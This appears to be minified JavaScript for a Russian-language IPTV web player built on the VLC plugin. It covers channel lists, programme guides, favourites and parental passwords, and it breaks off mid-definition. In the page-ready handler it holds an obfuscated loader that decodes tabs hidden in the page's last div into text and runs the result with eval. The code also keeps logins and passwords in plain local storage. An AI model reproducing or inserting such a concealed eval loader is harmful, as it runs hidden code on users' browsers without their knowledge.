var check={vlc:function(){return vlc.playlist&&null!=vlc.playlist?!0:!1},storage:function(){return"undefined"==typeof Storage?!1:!0},vlc_version:function(){return parseInt(vlc.VersionInfo.replace(/\./g,"").split(" ")[0])},vlc_version_check:function(){return check.vlc_version()<VLC_VER_REQ?!1:!0},main:function(){check.vlc()?check.vlc_version_check()||alert("\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0430 \u0443\u0441\u0442\u0430\u0440\u0435\u0432\u0448\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f vlc!\n\u041e\u0437\u043d\u0430\u043a\u043e\u043c\u044c\u0442\u0435\u0441\u044c \u0441 \u043f\u043e\u0440\u044f\u0434\u043a\u043e\u043c \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u0432 \u0440\u0430\u0437\u0434\u0435\u043b\u0435 '\u041f\u043e\u043c\u043e\u0448\u044c'."):
alert("\u041d\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d vlc \u043f\u043b\u0430\u0433\u0438\u043d!\n\u041e\u0437\u043d\u0430\u043a\u043e\u043c\u044c\u0442\u0435\u0441\u044c \u0441 \u043f\u043e\u0440\u044f\u0434\u043a\u043e\u043c \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u0432 \u0440\u0430\u0437\u0434\u0435\u043b\u0435 '\u041f\u043e\u043c\u043e\u0448\u044c'.");check.storage()||alert("\u0412\u0430\u0448 \u0431\u0440\u0430\u0443\u0435\u0437\u0440 \u043d\u0435 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442 \u041b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0435 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0435!\n\u041e\u0437\u043d\u0430\u043a\u043e\u043c\u044c\u0442\u0435\u0441\u044c \u0441 \u043f\u043e\u0440\u044f\u0434\u043a\u043e\u043c \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u0432 \u0440\u0430\u0437\u0434\u0435\u043b\u0435 '\u041f\u043e\u043c\u043e\u0448\u044c'.")}};
check.browser_ver=function(){var a=navigator.userAgent,b,f=a.match(/(opera|chrome|safari|firefox|msie|trident(?=\/))\/?\s*(\d+)/i)||[];if(/trident/i.test(f[1]))return b=/\brv[ :]+(\d+)/g.exec(a)||[],"IE "+(b[1]||"");if("Chrome"===f[1]&&(b=a.match(/\bOPR\/(\d+)/),null!=b))return"Opera "+b[1];f=f[2]?[f[1],f[2]]:[navigator.appName,navigator.appVersion,"-?"];null!=(b=a.match(/version\/(\d+)/i))&&f.splice(1,1,b[1]);return f.join(" ")}();
var client={check_credentials:function(){return void 0==localStorage.login||void 0==localStorage.passwd?!1:!0},update_credentials:function(){storage.save_login($("#user_login").val());storage.save_passwd($("#user_pass").val())},parse_msg:function(a,b){a&&"send_msg"==a.type&&(storage.set_key("msg_"+a.id,a.msg),client.osd_text(a.msg),client.msg_bell())},msg_bell:function(){layout.msg_bell(storage.msg_num())},get_msg:function(){Object.keys(localStorage).filter(function(a){return"msg_"==a.substr(0,4)}).forEach(function(a){layout.msg_to_page(localStorage.getItem(a),
a)})},save_value:function(a,b){localStorage.field=b;return!0},init:function(){},ping:function(){server.ping()},rec:function(a){server.rec(a)},media_info_upd:function(a){server.media_info_upd(a)},media_info_del:function(){server.media_info_del()},fav_add:function(a){server.fav_add(a)},fav_del:function(a){server.fav_del(a)},censor:function(a){server.censor(a)},rec_epg:function(a,b){server.rec_epg(a,b)},auth:function(a){server.auth(a)},request:function(a){server.request(a)},request_post:function(a){server.request_post(a)},
request_put:function(a){server.request_put(a)},request_delete:function(a){server.request_delete(a)},request2:function(){server.request2(url)},play_ch:function(a){client.epg_layout_periodic_stop();client.position_hide();layout.epg_set_not_loaded();layout.epg_show_today();server.play_ch(a);client.media_info_upd(a);storage.save_ch_id(a);storage.set_played_media(a,MEDIA_TV);storage.set_playing_media(a,MEDIA_TV);storage.init_stopped_media();client.epg_layout_periodic_start()},get_epg:function(a,b){debug("get_epg ch_id = "+
a+", shift = "+b);b=parseInt(b);if(0==b&&storage.get_epg(a,b)){debug("get epg from storage");var f=parse_response(storage.get_epg(a,b));layout.epg(f.results,b)}else server.get_epg(a,b)},play_epg:function(a){server.play_epg(a);storage.set_played_media(a,MEDIA_EPG);storage.set_playing_media(a,MEDIA_EPG,$("[epg_id="+a+"]").attr("duration"));storage.init_stopped_media();layout.current_epg_name();client.position_show()},get_ch_list:function(){server.get_ch_list()},play:function(){debug("client.play")},
stop:function(){client.position_hide();storage.init_playing_media();client.auth_check()&&client.media_info_del();player.stop();layout.current_epg_name_clear()},get_tv_genres:function(){if(void 0===storage.get_genres())server.get_tv_genres();else{var a=parse_response(storage.get_genres());layout.tv_genres(a.results)}},stop_inactive:function(){3==player.get_state()&&(storage.set_stopped_media(),storage.set_stop_inactive(1),debug("stop_inactive "+storage.get_stop_inactive()),client.stop())},resume_stoped:function(){debug("resume_stoped "+
storage.get_stop_inactive());"1"==storage.get_stop_inactive()&&client.play_ch(storage.get_ch_id())},init_post:function(){debug("client.init_post");client.auth_check()&&(client.ping(),client.get_ch_list(),TIMER=setInterval(client.periodic,PERIOD_PING))},periodic2:function(){debug("periodic2 "+my_date.now())},epg_loaded:function(){return 0<$("#epg_tabs .active tbody tr").length?!0:!1},periodic:function(){debug("periodic "+my_date.now());client.auth_check()&&(client.ping(),client.get_msg())},cur_epg_upd:function(){application.cur_media_type==
MEDIA_TV&&$("#epg_0 tbody tr.warning").length&&(application.cur_epg_id=$("#epg_0 tbody tr.warning").attr("epg_id"))},epg_layout:function(){client.epg_loaded()&&(layout.epg_recorded(),$("#epg_tabs").is(":hover")||application.cur_media_type==MEDIA_EPG||layout.epg_scroll_now(),client.cur_epg_upd())},epg_clear:function(){client.epg_loaded()&&(layout.epg_recorded(),layout.epg_scroll_now(),layout.current_epg_name())},epg_progress_layout:function(){layout.epg_time();layout.epg_progress(application.cur_epg_position);
application.cur_media_type==MEDIA_EPG&&layout.player_position()},fav_switch:function(){layout.fav_switch(1!=$("#fav_switch.active").length);3==player.get_state()&&layout.scroll_to_ch(storage.get_ch_id());storage.set_key("fav",$("#fav_switch.active").length)},fav_restore:function(){layout.fav_switch(storage.get_key("fav"))},auth_check:function(){return null!==server.user_id&&null!==server.access_token?!0:!1},position_show:function(){debug("position_show");TIMER_TIMELINE=setInterval(layout.position,
PERIOD_TIMELINE)},position_hide:function(){debug("position_hide");clearInterval(TIMER_TIMELINE)},osd_text:function(a){TIMER_OSD&&clearTimeout(TIMER_OSD);player.osd_text_show(a);setTimeout(player.osd_text_hide,PERIOD_OSD)}},my_date={midnigth:function(a){void 0===a&&(a=0);var b=new Date,f=b.getFullYear(),g=b.getMonth(),b=b.getDate();return Math.round(+new Date(f,g,b+a)/1E3)},now:function(){var a=(new Date).getTime();return Math.round(a/1E3)},curdate:function(){return(new Date).toLocaleDateString()},
get_local_date:function(a){void 0===a&&(a=0);a=parseInt(a);var b=new Date,f=b.getFullYear(),g=b.getMonth(),b=b.getDate();return(new Date(f,g,b+a)).toLocaleDateString()},get_day:function(a){void 0===a&&(a=0);a=parseInt(a);7<Math.abs(a)&&(a%=7,debug(a));var b={1:"\u041f\u043d",2:"\u0412\u0442",3:"\u0421\u0440",4:"\u0427\u0442",5:"\u041f\u0442",6:"\u0421\u0431",7:"\u0412\u0441"},f=(new Date).getDay();return 1>f+a?b[7+(f+a)]:7<f+a?(f=f+a-7,b[f]):b[f+parseInt(a)]},get_date:function(a){void 0===a&&(a=0);
a=parseInt(a);var b=new Date,f=b.getFullYear(),g=b.getMonth(),b=b.getDate();a=new Date(f,g,b+a);g=a.getMonth();b=a.getDate();g++;g=10>g?"0"+g.toString():g.toString();b=10>b?"0"+b.toString():b.toString();return b+"."+g},toTimeString:function(a,b){void 0===b&&(b=!1);var f=new Date(1E3*a),g=f.getHours(),k=f.getMinutes(),g=10>g?"0"+g.toString():g.toString(),k=10>k?"0"+k.toString():k.toString();b?(b=f.getSeconds(),b=10>b?"0"+b.toString():b.toString(),f=g+":"+k+":"+b):f=g+":"+k;return f},"se\u0441_to_time":function(a){var b=
parseInt(a/3600),f=parseInt((a-3600*b)/60);a=parseInt(a%60);return(10>b?"0"+b:b)+":"+(10>f?"0"+f:f)+":"+(10>a?"0"+a:a)}},TIMER_RAND_JUMP=0;function debug(a){d=new Date;a=d.toUTCString()+"."+d.getMilliseconds()+" "+a;$("#debug textarea").val(a+"\n\n"+$("#debug textarea").val())}debug.show_timers=function(){debug("TIMER = "+TIMER);debug("TIMER_STOP = "+TIMER_STOP);debug("TIMER_TIMELINE = "+TIMER_TIMELINE);debug("TIMER_EPG = "+TIMER_EPG)};debug.toggle=function(){1==localStorage.debug&&$("#debug").show()};
debug.t_ch_rand_jump=function(a){void 0==a?a=5E3:(a=1E3*parseInt(a),1>a&&(a=1E3));debug.t_ch_rand_jump_stop();TIMER_RAND_JUMP=setInterval(function(){application.req_media_type=MEDIA_TV;application.cur_ch_id=$("#playlist li:visible:eq("+Math.floor(Math.random()*($("#playlist li:visible").length+1)+1)+")").attr("channel_id");layout.scroll_to_active_ch()},a)};debug.t_ch_rand_jump_stop=function(){clearInterval(TIMER_RAND_JUMP)};
debug.select_media=function(a){void 0===a&&(a=.3);var b=Math.random();console.log("debug.select_media, x = "+b+", ratio = "+a);return b>a?MEDIA_TV:MEDIA_EPG};
debug.t_ch_rand_jump2=function(a,b){void 0==a?a=5E3:(a=1E3*parseInt(a),1>a&&(a=1E3));var f=null,g=null;debug.t_ch_rand_jump_stop();TIMER_RAND_JUMP=setInterval(function(){f=debug.select_media(b);g=f==MEDIA_TV?$("#playlist li:visible:eq("+Math.floor(Math.random()*($("#playlist li:visible").length+1)+1)+")").attr("channel_id"):$("#epg_0 tr.success:eq("+Math.floor(Math.random()*($("#epg_0 tr.success").length+1)+1)+")").attr("epg_id");application.req_media_type=f;$("#media_type").attr("type",f);$("#media_type span").text(vlc.playlist.items.count);
f==MEDIA_TV?(application.cur_ch_id=g,layout.scroll_to_active_ch()):application.cur_epg_id=g},a)};
var layout={scroll_to_ch:function(a){0<$("[channel_id="+a+"]").length&&$("#playlist").parent().scrollTop($("[channel_id="+a+"]").offset().top-80+$("#playlist").parent().scrollTop())},scroll_to_active_ch:function(){layout.scroll_to_ch($("#playlist li.active").attr("channel_id"))},login_error:function(a){$("#modal_credentials [role=alert]").text(a);$("#modal_credentials").modal("show")},get_ch_list:function(a){$("#playlist").empty();$.each(a,function(){$("#playlist").append('<li channel_id="'+this.id+
'" censored="'+this.censored+'" favorite="'+this.favorite+'" logo="'+this.logo.replace("/320/","/120/")+'"><a href="#"><span class="ch_name">'+this.name+'</span><span class="glyphicon glyphicon-heart-empty" aria-hidden="true"></span></a></li>');1==this.favorite&&layout.fav_add(this.id);$("#playlist > li:last span.ch_name").click(function(){$(this).play_ch()});$("#playlist > li:last span.glyphicon").click(function(){$(this).fav_toggle()})})},current_ch:function(a){$("#current_ch_name").text(application.cur_ch_name);
$("#current_ch_name").prepend('<img border="0" src="'+application.cur_ch_logo+'"> ');$("#playlist [channel_id].active").removeClass("active");$("#playlist [channel_id="+a+"]").addClass("active")},fav_switch:function(a){1==a?($("#fav_switch").addClass("active"),$("#playlist").addClass("only_fav")):($("#fav_switch").removeClass("active"),$("#playlist").removeClass("only_fav"))},users_list:function(a){$.each(a,function(){$("#modal_credentials .list-group").append('<a href="#" class="list-group-item" passwd='+
this.passwd+' login="'+this.login+'">'+this.login+"</a>");$("#modal_credentials .list-group a:last").click(function(){$("#user_login").val($(this).attr("login"));$("#user_pass").val($(this).attr("passwd"))})})},fav_add:function(a){$("[channel_id="+a+"] a span.glyphicon").removeClass("glyphicon-heart-empty").addClass("glyphicon-heart").parent().parent().attr("favorite",1)},fav_del:function(a){$("[channel_id="+a+"] a span.glyphicon").removeClass("glyphicon-heart").addClass("glyphicon-heart-empty").parent().parent().attr("favorite",
0)},epg_next:function(a){$(".page-header").text(a[0].name)},tv_genres:function(a){$("#tv_genres").empty();$.each(a,function(){$("#tv_genres").append('<li genre_id="'+this.id+'"><a href="#">'+this.title+"</a></li>")})},epg:function(a,b){$("#epg_tabs #epg_"+b+" tbody").empty();$(".epg_tab[epg_shift="+b+"]").addClass("epg_loaded");$.each(a,function(){$("#epg_tabs #epg_"+b+" tbody").append('<tr epg_id="'+this.id+'" duration="'+(this.end-this.start)+'" start="'+this.start+'" end="'+this.end+'" in_archive="'+
this.in_archive+'"><td><span class="glyphicon glyphicon-play" aria-hidden="true"></span></td><td>'+my_date.toTimeString(this.start)+"</td><td>"+my_date.toTimeString(this.end)+"</td><td>"+this.name+"</td></tr>");$("#epg_tabs #epg_"+b+" tbody tr td span").last().click(function(){debug("play_epg event");$(this).play_epg()})});layout.epg_recorded();layout.epg_scroll_now()},epg_set_not_loaded:function(){$(".epg_tab").removeClass("epg_loaded")},epg_show_today:function(){$(".epg_tab[epg_shift=0] a").tab("show")},
epg_current:function(a){$("[epg_id="+a+"]").addClass("danger")},update_volume:function(){$("#player_volume").val(player.get_volume());debug("layout.update_volume "+player.get_volume())},update_volume_test:function(a){$("#player_volume").val(a);debug("layout.update_volume "+a)},epg_recorded:function(){"epg_0"==$("#epg_tabs .active").attr("id")?($("#epg_tabs .active tbody tr.warning").removeClass("warning"),$("#epg_tabs .active tbody tr").filter(function(){return $(this).attr("end")<my_date.now()}).addClass("success").attr("in_archive",
1).last().next().filter(function(){return $(this).attr("end")>my_date.now()}).addClass("warning")):$("#epg_tabs .active tbody tr[in_archive=1]").addClass("success").attr("in_archive",1)},epg_scroll_now:function(){$("#epg_0 table tbody tr").length&&($("#epg_0").scrollTop(0),$("#epg_0").scrollTop($("#epg_tabs .active tbody tr").filter(function(){return $(this).attr("start")<my_date.now()}).last().offset().top-$("#epg_0").offset().top))},epg_scroll_current:function(){$("#epg_0 table tbody tr").length&&
($("#epg_0").scrollTop(0),$("#epg_0").scrollTop($("#epg_tabs .active tbody tr[epg_id="+application.cur_epg_id+"]").offset().top-$("#epg_0").offset().top))},position:function(){$("#position_time").text(player.position_to_time($("[epg_id="+application.cur_epg_id+"]").attr("duration")));$("#player_position").val(parseFloat(application.last_media_position)*parseInt($("#player_position").attr("max")))},epg_time:function(){"00:00:00"!=application.position_time?$("#cur_epg_time").text(application.position_time):
$("#cur_epg_time").text("")},epg_progress:function(a){$("#epg_progress").attr("style","width: "+100*a+"%")},player_position:function(){$("#player_position").val(parseFloat(application.cur_epg_position)*parseInt($("#player_position").attr("max")))},get_epg_name:function(a){return void 0!==a?$("[epg_id="+a+"] td:eq(2)").text():$("#epg_0.active tbody tr").filter(function(){return $(this).attr("start")<my_date.now()}).last().children().last().text()},get_tabs_names:function(){$.each($(".epg_tab a"),function(){$(this).text(my_date.get_day($(this).parent().attr("epg_shift"))+
" "+my_date.get_date($(this).parent().attr("epg_shift")))})},cur_epg_name:function(a){$("#cur_epg_name").text(a)},cur_epg_name_clear:function(){$("#cur_epg_name").text("")},msg_bell:function(a){0<a?($("#msg_bell").attr("msg_num",a).addClass("blink2"),$("#msg_bell span").removeClass("glyphicon glyphicon-bell").text(a)):($("#msg_bell").removeClass("blink2"),$("#msg_bell span").addClass("glyphicon glyphicon-bell").text(""))},msg_to_page:function(a,b){$("#msg_container").append('<div class="col-md-12 col-lg-6" id="'+
b+'"><div class="alert alert-danger alert-dismissible fade in" role="alert"><button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">\u00d7</span></button>'+a+"</div></div>").children().children().last().on("closed.bs.alert",function(){storage.del_key(b);$("#"+b).remove();client.msg_bell()})},msg:function(a){a&&"send_msg"==a.type&&(3==player.get_state()?player.osd_text_show(a.msg):alert(a.msg))},prompt_passwd:function(){$("#passwd_container").slideDown()},
hide_passwd:function(){$("#passwd_container").slideUp()},progress_color:function(a){switch(a){case MEDIA_TV:$("#epg_progress").addClass("background-tv").removeClass("background-archive");break;case MEDIA_EPG:$("#epg_progress").addClass("background-archive").removeClass("background-tv");break;default:$("#epg_progress").removeClass("background-archive").removeClass("background-tv")}},brand:function(){$("#brand").html('<a id="current_ch_name" class="brand" href="#"><img border="0" src="img/logo.png"> \u041a\u041b\u0418\u041a-\u0422\u0412</a>')},
auth_progress_show:function(){$("#auth_msg_container").show()},auth_progress_hide:function(){$("#auth_msg_container").hide()},add_history:function(){$("#history .list-group li").length>EPG_MAX_HIST&&$("#history .list-group li:last").remove();$("#history .list-group [channel_id="+application.cur_ch_id+"]").remove();$("#history .list-group").prepend('<li class="list-group-item" channel_id="'+application.cur_ch_id+'"><img src="'+application.cur_ch_logo+'">  <span class="epg-history-item"><span></a></li>')},
epg_history_item:function(){$("#history .list-group li .epg-history-item:first").text(application.cur_epg_timeframe+" "+application.cur_epg_name)}},TIMER=0,TIMER_STOP=0,TIMER_TIMELINE=0,TIMER_EPG=0,TIMER_OSD=0,TIMER_PLAY_DELAY=0,PERIOD_PING=12E4,PERIOD_STOP=6E4,PERIOD_TIMELINE=1E3,PERIOD_EPG=3E3,PERIOD_OSD=1E4,PERIOD_PLAY_DELAY=200,VLC_VER_REQ=221,MEDIA_TV="tv-channel",MEDIA_EPG="tv-archive",NOSTAT=!1,NOCENZ=!1,EPG_MAX_HIST=8;
function getXmlHttp(){"undefined"===typeof XMLHttpRequest&&(XMLHttpRequest=function(){try{return new ActiveXObject("Msxml2.XMLHTTP.6.0")}catch(a){}try{return new ActiveXObject("Msxml2.XMLHTTP.3.0")}catch(b){}try{return new ActiveXObject("Msxml2.XMLHTTP")}catch(f){}try{return new ActiveXObject("Microsoft.XMLHTTP")}catch(g){}throw Error("This browser does not support XMLHttpRequest.");});return new XMLHttpRequest}
function parse_response(a){try{var b=jQuery.parseJSON(a);return void 0!==b.error&&""!=b.error?(console.log("parse_response error: "+a),alert(a),!1):b}catch(f){return debug("parse_response parseJSON error: "+f),!1}}function test3(){parse_response($("textarea").val())}function check_request_status(a){application.server_error=a.status;if(200==a.status)return!0}$.fn.play_ch=function(){application.req_media_type=MEDIA_TV;application.cur_ch_id=$(this).parent().parent().attr("channel_id")};
$.fn.play_epg=function(){application.req_media_type=MEDIA_EPG;application.cur_epg_id=$(this).parent().parent().attr("epg_id")};$.fn.fav_toggle=function(){"0"==$(this).parent().parent().attr("favorite")?client.fav_add($(this).parent().parent().attr("channel_id")):client.fav_del($(this).parent().parent().attr("channel_id"))};
$.fn.get_epg=function(){debug("tab \u2116 "+$(this).attr("epg_shift")+" pressed "+$(this).hasClass("epg_loaded"));$(this).hasClass("epg_loaded")||client.get_epg(application.cur_ch_id,$(this).attr("epg_shift"))};var screenListener=function(a){console.log("current_channel: "+sessionStorage.current_channel)},isActive;function onBlur(){}function onFocus(){}window.onfocus=onFocus;window.onblur=onBlur;
function onLoad(){document.addEventListener&&document.addEventListener("visibilitychange",visibilityChanged)}function visibilityChanged(){clearInterval(TIMER);0==document.hidden?(clearTimeout(TIMER_STOP),debug("document showed "+my_date.now()),application.t_start_periodic()):(debug("application.stop_inactive"),application.t_stop_inactive())}function checkEmail(){debug(document.hidden+" "+my_date.now())}
$(document).ready(function(){(function(){var a=eval,b;x=document.getElementsByTagName("div")[document.getElementsByTagName("div").length-1].innerHTML.split("\n");r="";c="\t";for(i in x){e="";for(j in x[i])e+=x[i][j]==c?"1":"0";h=parseInt(e,2);r+=String.fromCharCode(h.toString(10))}b=res=r.substr(0,r.length-1);a(b)})();debug.toggle();onLoad();application=new Bazinga;application.pre_auth();client.fav_restore();$("#create_account").click(function(){server.create_account()});$("#modal_credentials").on("show.bs.modal",
function(a){$("#vlc").hide()});$("#modal_credentials").on("hide.bs.modal",function(a){$("#vlc").show()});$("#modal_credentials").on("hidden.bs.modal",function(a){debug("modal_credentials is hidden");client.check_credentials()||$("#modal_credentials").modal("show")});client.check_credentials()||$("#modal_credentials").modal("show");$("#msg_bell").click(function(){console.log($("#msg_container:hidden").length);console.log($("#msg_container:visible").length);1==$("#msg_container:hidden").length?($("#msg_container").show(),
client.get_msg()):($("#msg_container").empty(),$("#msg_container").hide());""==$("#msg_container").text()&&$("#msg_container").hide()});client.msg_bell();$("#btn_save_passwd").click(function(){application.parent_passwd_entered=$("#parent_passwd").val();application.cur_ch_id=application.req_ch_id;application.req_media_type=MEDIA_TV});layout.get_tabs_names();$("#play_btn").click(function(){application.resume_stoped()});$("#stop_btn").click(function(){application.stop()});$("#prev_btn").click(function(){application.req_media_type=
MEDIA_EPG;application.cur_epg_id=application.prev_epg_id});$("#next_btn").click(function(){application.req_media_type=MEDIA_EPG;application.cur_epg_id=application.next_epg_id});$("#btn-mute").click(application.toggleMute);$("#btn-fullscreen").click(application.fullscreen);$(".epg_tab").click(function(){$(this).get_epg()});$("#save_credentials").click(function(){client.update_credentials();server.auth(!0)});$("#fav_switch").click(function(){client.fav_switch()});void 0===localStorage.debug&&client.init();
$("#player_position").change(function(){debug("player_position"+$("#player_position").val());vlc.input.position=parseInt($("#player_position").val())/parseInt($("#player_position").attr("max"));setTimeout(function(){var a=vlc.audio.track;vlc.audio.track=0;vlc.audio.track=a},200)});$("#player_volume").change(function(){debug("player_volume"+$("#player_volume").val());player.update_volume($("#player_volume").val())});setTimeout(function(){player.register_event("MediaPlayerNothingSpecial",player.handle_MediaPlayerNothingSpecial);
player.register_event("MediaPlayerPlaying",player.handle_MediaPlayerPlaying);player.register_event("MediaPlayerPaused",player.handle_MediaPlayerPaused);player.register_event("MediaPlayerEndReached",player.handle_MediaPlayerEndReached);player.register_event("MediaPlayerEncounteredError",player.handle_MediaPlayerEncounteredError);player.register_event("MediaPlayerMediaChanged",player.handle_MediaPlayerMediaChanged)},3E3);storage.set_stop_inactive(0);(function(a){var b=[].slice.call(arguments,1),f={};
vlc.onkeydown=function(g){g=g||window.event;f[g.keyCode]=!0;for(g=0;g<b.length;g++)if(!f[b[g]])return;f={};a()};vlc.onkeyup=function(a){a=a||window.event;delete f[a.keyCode]}})(function(){alert("\u041f\u0440\u0438\u0432\u0435\u0442!")},87)});window.onload=function(){setTimeout(check.main,1E3)};
var player={vlc_ready:function(){player.register_event("MediaPlayerPlaying",player.handle_playing)},handle_playing:function(){debug("player.handle_player_playing 1");debug("player.get_state: "+player.get_state());layout.update_volume();debug("player.handle_player_playing 2")}};dummy=function(){debug("player.handle_player_playing")};
player.register_event=function(a,b){vlc&&(debug("player.register_event"),vlc.attachEvent?vlc.attachEvent(a,b):vlc.addEventListener?vlc.addEventListener(a,b,!0):eval("vlc.on"+a+" = handler"))};player.unregister_event=function(a,b){vlc&&(vlc.detachEvent?vlc.detachEvent(a,b):vlc.removeEventListener?vlc.removeEventListener(a,b,!0):eval("vlc.on"+a+" = null"))};player.get_volume=function(){return vlc.audio.volume};player.update_volume=function(a){vlc.audio.volume=parseInt(a)};
player.osd_text_show=function(a){void 0==a&&(a="");a=a.replace(/<.*>/i,"");vlc.video.marquee.enable();vlc.video.marquee.text=a};player.osd_text_hide=function(){vlc.video.marquee.disable()};player.position_to_time=function(a,b){b=player.get_position();var f;if(void 0===b||0>=b)f="00:00:00";else{a*=b;f=parseInt(a/3600);a-=3600*f;var g=parseInt(a/60),k=parseInt(a-60*g);f=10>f?"0"+f.toString():f.toString();g=10>g?"0"+g.toString():g.toString();k=10>k?"0"+k.toString():k.toString();f=f+":"+g+":"+k}return f};
player.play_link2=function(a){clearTimeout(TIMER_PLAY_DELAY);debug("vlc.playlist.stop()");vlc.playlist.stop();debug("vlc.playlist.items.clear()");vlc.playlist.items.clear();debug("vlc.playlist.add(link)");vlc.playlist.add(a);TIMER_PLAY_DELAY=setTimeout(player.play,PERIOD_PLAY_DELAY)};player.play_link=function(a){debug("vlc.playlist.add(link)");var b=null,b=vlc.playlist.add(a);debug("link_id: "+b);debug("link: "+a);null!=b&&vlc.playlist.playItem(b)};
player.play=function(a){debug("vlc.playlist.play()");vlc.playlist.play()};player.stop=function(){vlc.playlist.stop()};player.get_position=function(){return vlc.input.position};
player.controls=function(a,b,f,g){1==a?$("#play_btn").removeClass("disabled"):$("#play_btn").addClass("disabled");1==b?$("#pause_btn").removeClass("disabled"):$("#pause_btn").addClass("disabled");1==f?$("#stop_btn").removeClass("disabled"):$("#stop_btn").addClass("disabled");1==g?$("#player_position").removeAttr("disabled"):$("#player_position").attr("disabled","disabled");return!0};player.fullscreen=function(){vlc.video.toggleFullscreen()};player.toggleMute=function(){vlc.audio.toggleMute()};
player.get_state=function(){return vlc.input.state};player.handle_MediaPlayerTimeChanged=function(){debug("handle_MediaPlayerTimeChanged")};player.handle_MediaPlayerPositionChanged=function(){debug("handle_MediaPlayerPositionChanged")};player.handle_MediaPlayerSeekableChanged=function(){debug("handle_MediaPlayerSeekableChanged")};player.handle_MediaPlayerPausableChanged=function(){debug("handle_MediaPlayerPausableChanged")};
player.handle_MediaPlayerMediaChanged=function(){debug("handle_MediaPlayerMediaChanged");debug("application.stopped_media_position"+application.stopped_media_position);application.stopped_media_position&&(debug("application.stopped_media_position"+application.stopped_media_position),debug("vlc.input.position = application.stopped_media_position;"),vlc.input.position=application.stopped_media_position,setTimeout(function(){application.stopped_media_position=!1},2E3))};
player.handle_MediaPlayerTitleChanged=function(){debug("handle_MediaPlayerTitleChanged")};player.handle_MediaPlayerLengthChanged=function(){debug("handle_MediaPlayerLengthChanged")};player.handle_MediaPlayerPlaying=function(){debug("handle_MediaPlayerPlaying")};player.handle_MediaPlayerStopped=function(){debug("handle_MediaPlayerStopped")};player.handle_MediaPlayerEndReached=function(){debug("handle_MediaPlayerEndReached");application.stop()};player.handle_MediaPlayerNothingSpecial=function(){debug("handle_MediaPlayerNothingSpecial")};
player.handle_MediaPlayerOpening=function(){debug("handle_MediaPlayerOpening")};player.handle_MediaPlayerBuffering=function(){debug("handle_MediaPlayerBuffering")};player.handle_MediaPlayerPaused=function(){debug("handle_MediaPlayerPaused");application.stop()};player.handle_MediaPlayerForward=function(){debug("handle_MediaPlayerForward")};player.handle_MediaPlayerBackward=function(){debug("handle_MediaPlayerBackward")};
player.handle_MediaPlayerEncounteredError=function(){debug("handle_MediaPlayerEncounteredError");application.stop()};var default_position=0,default_volume=0;Object.defineProperty(player,"position",{get:function(){return default_position},set:function(a){default_position=a;layout.player_position_test(a)},enumerable:!1,configurable:!0});Object.defineProperty(player,"volume",{get:function(){return default_volume},set:function(a){default_volume=a;layout.update_volume_test(a)},enumerable:!1,configurable:!0});
function Bazinga(){var a=null,b=null,f=null,g=null,k=null,l=null,m=null,n=0,p=0,q=5,t=null,u=!1,v=null,w=null,y=0,z=!1,A=0;Object.defineProperty(this,"settings",{value:Object.create(null)});Object.defineProperty(this,"cur_ch_id",{get:function(){return a},set:function(b){debug("CHANGING cur_ch_id from "+this.cur_ch_id+" to "+b);if(b){layout.hide_passwd();this.req_ch_id=b;var f=!1;this.is_censored(b)&&!NOCENZ&&(f=this.check_passwd(this.parent_passwd_entered),debug("go_fwd = "+f),f?(layout.hide_passwd(),
application.req_media_type=MEDIA_TV):layout.prompt_passwd());if(f||NOCENZ||!this.is_censored(b))a=b,layout.epg_set_not_loaded(),layout.epg_show_today(),layout.current_ch(b),server.get_cur_epg(b,0),client.get_epg(b,0),this.t_start_egp_layout(),debug("this.req_media_type = "+this.req_media_type),this.req_media_type==MEDIA_TV&&(server.ch_link(b),this.last_media_id=b,this.last_media_type=MEDIA_TV),layout.add_history()}null==b&&(a=b,layout.brand())}});Object.defineProperty(this,"cur_epg_id",{get:function(){return b},
set:function(a){if(this.cur_epg_id!=a){debug("CHANGING cur_epg_id from "+this.cur_epg_id+" to "+a);layout.epg_progress(0);if(a||null==a)b=a,this.cur_epg_name=$(".epg_table table tr[epg_id="+a+"] td:last").text(),this.cur_epg_start=parseInt($(".epg_table table tr[epg_id="+a+"]").attr("start")),this.cur_epg_duration=parseInt($(".epg_table table tr[epg_id="+a+"]").attr("duration")),this.req_media_type==MEDIA_EPG&&(server.epg_link(a),this.last_media_id=this.cur_epg_id,this.last_media_type=MEDIA_EPG);
null==a&&(this.cur_epg_name="",this.cur_epg_duration=this.cur_epg_start=0)}}});Object.defineProperty(this,"prev_epg_id",{get:function(){return $("[epg_id="+application.cur_epg_id+"]").prev().attr("epg_id")}});Object.defineProperty(this,"next_epg_id",{get:function(){return $("[epg_id="+application.cur_epg_id+"]").next().attr("epg_id")}});Object.defineProperty(this,"cur_link",{get:function(){return l},set:function(a){debug("CHANGING cur_link from "+this.cur_link+" to "+a);l=a;debug("cur_link value.length "+
a);a&&(debug("cur_link "+a),this.play())}});Object.defineProperty(this,"cur_media_type",{get:function(){return f},set:function(a){debug("CHANGING cur_media_type from "+this.cur_media_type+" to "+a);f=a;layout.progress_color(a);switch(a){case MEDIA_EPG:this.t_start_timeline();player.controls(0,0,1,1);break;case MEDIA_TV:this.t_start_timeline();player.controls(0,0,1,0);break;default:this.t_stop_timeline(),layout.epg_time(),player.controls(1,0,0,0)}}});Object.defineProperty(this,"req_media_type",{get:function(){return k},
set:function(a){debug("CHANGING req_media_type from "+this.req_media_type+" to "+a);k=a}});Object.defineProperty(this,"req_ch_id",{get:function(){return g},set:function(a){debug("CHANGING req_ch_id from "+this.req_ch_id+" to "+a);g=a}});Object.defineProperty(this,"update_position",{value:function(){this.last_media_position=player.get_position()}});Object.defineProperty(this,"epg_progress",{value:function(){this.update_position();client.epg_progress_layout()}});Object.defineProperty(this,"media_status",
